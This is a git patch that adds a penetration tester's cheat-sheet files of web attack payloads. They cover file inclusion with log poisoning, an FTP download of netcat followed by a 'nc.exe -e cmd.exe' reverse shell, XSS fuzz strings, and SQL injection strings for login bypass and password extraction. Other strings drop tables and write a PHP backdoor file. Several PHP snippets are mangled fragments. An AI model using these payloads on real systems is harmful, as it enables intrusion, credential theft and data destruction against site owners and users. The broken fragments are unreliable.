From 1ec27c494cca48578cf1d9ef3fa0dd385503c9e3 Mon Sep 17 00:00:00 2001 From: 51x Date: Mon, 16 Jan 2017 21:52:08 +0100 Subject: [PATCH] note updates --- .../.ptz/v3das/web_file_inclusion.txt | 41 ++++++++++++++++++ profile_files/.ptz/v3das/web_fuzz_strings.txt | 14 ++++++ .../.ptz/v3das/web_injection_php.txt | 11 +++++ .../.ptz/v3das/web_injection_sqli.txt | 43 +++++++++++++++++++ .../.ptz/v3das/web_xss_cookie_stealing.txt | 3 ++ 5 files changed, 112 insertions(+) create mode 100644 profile_files/.ptz/v3das/web_file_inclusion.txt create mode 100644 profile_files/.ptz/v3das/web_fuzz_strings.txt create mode 100644 profile_files/.ptz/v3das/web_injection_php.txt create mode 100644 profile_files/.ptz/v3das/web_injection_sqli.txt create mode 100644 profile_files/.ptz/v3das/web_xss_cookie_stealing.txt diff --git a/profile_files/.ptz/v3das/web_file_inclusion.txt b/profile_files/.ptz/v3das/web_file_inclusion.txt new file mode 100644 index 0000000..c4e4c7e --- /dev/null +++ b/profile_files/.ptz/v3das/web_file_inclusion.txt @@ -0,0 +1,41 @@ + +Local File Inclusion +==================== + +The %00 make php 5.3 and below ignore everything after that. + +Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00 +...then let's add code to the access log :) +~# nc 192.168.1.1 80 + +...and use it +http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00 +...or php shell on linux:) +&3 2>&3");?> +...finally send the requests to nc and exploit: + +# Windows FTP upload +echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt +nc.exe -e cmd.exe 192.168.1.1  31337 + +- - - - - - - - + ftp.txt'); ?> +> ftp.txt'); ?> +> ftp.txt'); ?> +> ftp.txt'); ?> +> ftp.txt'); ?> +> ftp.txt'); ?> + + + + + + + + + +Remote file Inclusion +===================== +Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00 +Note: the login.txt contains + diff --git a/profile_files/.ptz/v3das/web_fuzz_strings.txt b/profile_files/.ptz/v3das/web_fuzz_strings.txt new file mode 100644 index 0000000..72bb7c3 --- /dev/null +++ b/profile_files/.ptz/v3das/web_fuzz_strings.txt @@ -0,0 +1,14 @@ + +XSS locator +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> + + +XSS locator 2 +'';!--"=&{()} + + + + +Other fuzzing char list +><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{} + diff --git a/profile_files/.ptz/v3das/web_injection_php.txt b/profile_files/.ptz/v3das/web_injection_php.txt new file mode 100644 index 0000000..72dd935 --- /dev/null +++ b/profile_files/.ptz/v3das/web_injection_php.txt @@ -0,0 +1,11 @@ + +PHP command injection +===================== + +There are just some ideas. + + + + + + diff --git a/profile_files/.ptz/v3das/web_injection_sqli.txt b/profile_files/.ptz/v3das/web_injection_sqli.txt new file mode 100644 index 0000000..d459f64 --- /dev/null +++ b/profile_files/.ptz/v3das/web_injection_sqli.txt @@ -0,0 +1,43 @@ + +SQLi notes +========== + +Login bypass +any' or 1=1 limit 1 ;# +' OR '1' = '1 / ' OR '1' = '1 +;# ;-- # + + +?id=737 order by 6 --> Testing max columns +?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database +?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits? +?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration +?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration +?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info + + +More examples + +x%') # +x%') or 1=1 # +x%') order by 4 # +x%') union select all 4 # +x%') union select all 1,2,3@@version # +x%') and 1=1 # + +x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) # +x%') and drop table if exists customers # +x%') and create database test # +x%') ; DROP ALL TABLES; # + +@@hostname + +wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value" + + +Adding backdor.php +?id=737 union select all 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php' + +Getting a shell with php execute +192.168.3.1/comment.php?id=737 union select all 1,2,3,4," ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php' + diff --git a/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt new file mode 100644 index 0000000..e494f29 --- /dev/null +++ b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt @@ -0,0 +1,3 @@ + + +